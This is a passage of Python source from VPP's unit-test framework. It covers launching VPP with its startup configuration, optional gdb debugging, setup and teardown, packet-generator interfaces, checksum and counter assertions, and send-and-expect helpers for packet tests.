cls.vpp_cmdline.extend([
"corelist-workers", ",".join([str(x) for x in cls.cpus[1:]])])
cls.vpp_cmdline.extend([
"}",
"physmem", "{", "max-size", "32m", "}",
"statseg", "{", "socket-name", cls.get_stats_sock_path(),
cls.extra_vpp_statseg_config, "}",
"socksvr", "{", "socket-name", cls.get_api_sock_path(), "}",
"node { ", default_variant, "}",
"api-fuzz {", api_fuzzing, "}",
"plugins", "{", "plugin", "dpdk_plugin.so", "{", "disable", "}",
"plugin", "rdma_plugin.so", "{", "disable", "}",
"plugin", "lisp_unittest_plugin.so", "{", "enable", "}",
"plugin", "unittest_plugin.so", "{", "enable", "}"
] + cls.extra_vpp_plugin_config + ["}", ])
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if not cls.debug_attach:
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug VPP using:")
if cls.debug_gdbserver:
print(f"sudo gdb {config.vpp} "
f"-ex 'target remote localhost:{cls.gdbserver_port}'")
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print(f"sudo gdb {config.vpp} -ex 'attach {cls.vpp.pid}'")
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def attach_vpp(cls):
cls.vpp = DummyVpp()
@classmethod
def run_vpp(cls):
cls.logger.debug(f"Assigned cpus: {cls.cpus}")
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or\
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def get_stats_sock_path(cls):
return "%s/stats.sock" % cls.tempdir
@classmethod
def get_api_sock_path(cls):
return "%s/api.sock" % cls.tempdir
@classmethod
def get_api_segment_prefix(cls):
return os.path.basename(cls.tempdir) # Only used for VAPI
@classmethod
def get_tempdir(cls):
if cls.debug_attach:
tmpdir = f"{config.tmp_dir}/unittest-attach-gdb"
else:
tmpdir = f"{config.tmp_dir}/vpp-unittest-{cls.__name__}"
if config.wipe_tmp_dir:
shutil.rmtree(tmpdir, ignore_errors=True)
os.mkdir(tmpdir)
return tmpdir
@classmethod
def create_file_handler(cls):
if config.log_dir is None:
cls.file_handler = FileHandler(f"{cls.tempdir}/log.txt")
return
logdir = f"{config.log_dir}/vpp-unittest-{cls.__name__}"
if config.wipe_tmp_dir:
shutil.rmtree(logdir, ignore_errors=True)
os.mkdir(logdir)
cls.file_handler = FileHandler(f"{logdir}/log.txt")
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
cls.logger = get_logger(cls.__name__)
random.seed(config.rnd_seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
cls.set_debug_flags(config.debug)
cls.tempdir = cls.get_tempdir()
cls.create_file_handler()
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" % cls.__name__)
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, api socket is %s",
cls.tempdir, cls.get_api_sock_path())
cls.logger.debug("Random seed is %s", config.rnd_seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._pcaps = []
cls._old_pcaps = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
if cls.debug_attach:
cls.attach_vpp()
else:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, config.vpp)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
if not cls.debug_attach:
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver or cls.debug_attach:
cls.vapi_response_timeout = 0
cls.vapi = VppPapiProvider(cls.__name__, cls,
cls.vapi_response_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.statistics = VPPStats(socketname=cls.get_stats_sock_path())
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except (vpp_papi.VPPIOError, Exception) as e:
cls.logger.debug("Exception connecting to vapi: %s" % e)
cls.vapi.disconnect()
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise e
if cls.debug_attach:
last_line = cls.vapi.cli("show thread").split("\n")[-2]
cls.vpp_worker_count = int(last_line.split(" ")[0])
print("Detected VPP with %s workers." % cls.vpp_worker_count)
except vpp_papi.VPPRuntimeError as e:
cls.logger.debug("%s" % e)
cls.quit()
raise e
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise e
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
cls._debug_quit()
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug(cls.vapi.vpp.get_stats())
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if not cls.debug_attach and cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
try:
outs, errs = cls.vpp.communicate(timeout=5)
except subprocess.TimeoutExpired:
cls.vpp.kill()
outs, errs = cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
if not cls.debug_attach:
cls.vpp.stdout.close()
cls.vpp.stderr.close()
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if config.debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
if self.remove_configured_vpp_objects_on_tear_down:
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
except VppTransportSocketIOError:
self.logger.debug("VppTransportSocketIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_pcap(cls, intf, worker):
""" Register a pcap in the testclass """
# add to the list of captures with current timestamp
cls._pcaps.append((intf, worker))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
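    # Illustrative sketch (not part of the framework): given the sample CLI
    # output quoted above, the two partition() calls isolate the float, e.g.
    #   s = "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
    #   head = s.partition(',')[0]                      # "Time now 2.190522"
    #   value = float(head.partition('Time now')[2])    # 2.190522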
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls, trace=True):
""" Enable the PG, wait till it is done, then clean up """
for (intf, worker) in cls._old_pcaps:
intf.handle_old_pcap_file(intf.get_in_path(worker),
intf.in_history_counter)
cls._old_pcaps = []
if trace:
cls.vapi.cli("clear trace")
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
# PG, when starts, runs to completion -
# so let's avoid a race condition,
# and wait a little till it's done.
# Then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for intf, worker in cls._pcaps:
cls.vapi.cli('packet-generator delete %s' %
intf.get_cap_name(worker))
cls._old_pcaps = cls._pcaps
cls._pcaps = []
@classmethod
def create_pg_interfaces_internal(cls, interfaces, gso=0, gso_size=0,
mode=None):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size, mode)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_pg_ip4_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_IP4)
@classmethod
def create_pg_ip6_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_IP6)
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_ETHERNET)
@classmethod
def create_pg_ethernet_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_ETHERNET)
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
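    # Illustrative sketch (not part of the framework): the "+ 4" above
    # presumably accounts for the 4-byte Ethernet FCS, so e.g. a 60-byte
    # packet extended to size=100 gets 100 - (60 + 4) = 36 padding bytes
    # appended to packet[Raw].load.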
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
# retrieve payload, currently 18 bytes (4 x ints + 1 short)
return pack('iiiih', info.index, info.src,
info.dst, info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
# retrieve payload, currently 18 bytes (4 x ints + 1 short)
payload_b = getattr(payload, payload_field)[:18]
info = _PacketInfo()
info.index, info.src, info.dst, info.ip, info.proto \
= unpack('iiiih', payload_b)
# some SRv6 TCs depend on getting an exception if bad values are detected
if info.index > 0x4000:
raise ValueError('Index value is invalid')
return info
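    # Illustrative sketch (not part of the framework): info_to_payload() and
    # payload_to_info() are inverses over the 18-byte 'iiiih' struct
    # (4 ints + 1 short), e.g.
    #   raw = pack('iiiih', 1, 2, 3, 4, 17)   # index, src, dst, ip, proto
    #   unpack('iiiih', raw[:18])             # -> (1, 2, 3, 4, 17)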
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
layer = layer.copy()
layer.remove_payload()
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(temp.getlayer(counter), cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
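    # Illustrative sketch (not part of the framework): for counters that do
    # not start with "/", get_counter() scans the "sh errors" CLI output and
    # returns int() of the first column of the first data row whose second
    # whitespace-separated field equals the requested counter string
    # (hypothetical row: "       17    ip4-input    some error reason").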
def assert_counter_equal(self, counter, expected_value,
thread=None, index=0):
c = self.get_counter(counter)
if thread is not None:
c = c[thread][index]
else:
c = sum(x[index] for x in c)
self.assert_equal(c, expected_value, "counter `%s'" % counter)
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics[counter].sum()
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def virtual_sleep(self, timeout, remark=None):
self.logger.debug("Moving VPP time by %s (%s)", timeout, remark)
self.vapi.cli("set clock adjust %s" % timeout)
def pg_send(self, intf, pkts, worker=None, trace=True):
intf.add_stream(pkts, worker=worker)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start(trace=trace)
def snapshot_stats(self, stats_diff):
"""Return snapshot of interesting stats based on diff dictionary."""
stats_snapshot = {}
for sw_if_index in stats_diff:
for counter in stats_diff[sw_if_index]:
stats_snapshot[counter] = self.statistics[counter]
self.logger.debug(f"Took statistics stats_snapshot: {stats_snapshot}")
return stats_snapshot
def compare_stats_with_snapshot(self, stats_diff, stats_snapshot):
"""Assert appropriate difference between current stats and snapshot."""
for sw_if_index in stats_diff:
for cntr, diff in stats_diff[sw_if_index].items():
if sw_if_index == "err":
self.assert_equal(
self.statistics[cntr].sum(),
stats_snapshot[cntr].sum() + diff,
f"'{cntr}' counter value (previous value: "
f"{stats_snapshot[cntr].sum()}, "
f"expected diff: {diff})")
else:
try:
self.assert_equal(
self.statistics[cntr][:, sw_if_index].sum(),
stats_snapshot[cntr][:, sw_if_index].sum() + diff,
f"'{cntr}' counter value (previous value: "
f"{stats_snapshot[cntr][:, sw_if_index].sum()}, "
f"expected diff: {diff})")
except IndexError:
# if diff is 0, then this most probably a case where
# test declares multiple interfaces but traffic hasn't
# passed through this one yet - which means the counter
# value is 0 and can be ignored
if 0 != diff:
raise
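    # Illustrative sketch (not part of the framework): stats_diff maps a
    # sw_if_index (or the literal key "err") to {counter_name: expected_delta},
    # e.g. (hypothetical names and values)
    #   stats_diff = {1: {"/if/rx": 10}, "err": {"/err/ip4-input/drops": 0}}
    # snapshot_stats() records the current value of each referenced counter and
    # compare_stats_with_snapshot() later asserts snapshot + delta == current.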
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None,
stats_diff=None, trace=True, msg=None):
if stats_diff:
stats_snapshot = self.snapshot_stats(stats_diff)
self.pg_send(intf, pkts)
try:
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.assert_nothing_captured(timeout=timeout, remark=remark)
timeout = 0.1
finally:
if trace:
if msg:
self.logger.debug(f"send_and_assert_no_replies: {msg}")
self.logger.debug(self.vapi.cli("show trace"))
if stats_diff:
self.compare_stats_with_snapshot(stats_diff, stats_snapshot)
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None,
trace=True, msg=None, stats_diff=None):
if stats_diff:
stats_snapshot = self.snapshot_stats(stats_diff)
if not n_rx:
n_rx = 1 if isinstance(pkts, Packet) else len(pkts)
self.pg_send(intf, pkts, worker=worker, trace=trace)
rx = output.get_capture(n_rx)
if trace:
if msg:
self.logger.debug(f"send_and_expect: {msg}")
self.logger.debug(self.vapi.cli("show trace"))
if stats_diff:
self.compare_stats_with_snapshot(stats_diff, stats_snapshot)
return rx
def send_and_expect_load_balancing(self, input, pkts, outputs,
worker=None, trace=True):
self.pg_send(input, pkts, worker=worker, trace=trace)
rxs = []
for oo in outputs:
rx = oo._get_capture(1)
self.assertNotEqual(0, len(rx))
rxs.append(rx)
if trace:
self.logger.debug(self.vapi.cli("show trace"))
return rxs
def send_and_expect_some(self, intf, pkts, output,
worker=None,
trace=True):
self.pg_send(intf, pkts, worker=worker, trace=trace)
rx = output._get_capture(1)
if trace:
self.logger.debug(self.vapi.cli("show trace"))
self.assertTrue(len(rx) > 0)
self.assertTrue(len(rx) < len(pkts))
return rx
def send_and_expect_only(self, intf, pkts, output, timeout=None,
stats_diff=None):
if stats_diff:
stats_snapshot = self.snapshot_stats(stats_diff)
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.assert_nothing_captured(timeout=timeout)
timeout = 0.1
if stats_diff:
self.compare_stats_with_snapshot(stats_diff, stats_snapshot)
return rx
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
:param stream File descriptor to store where to report test results.
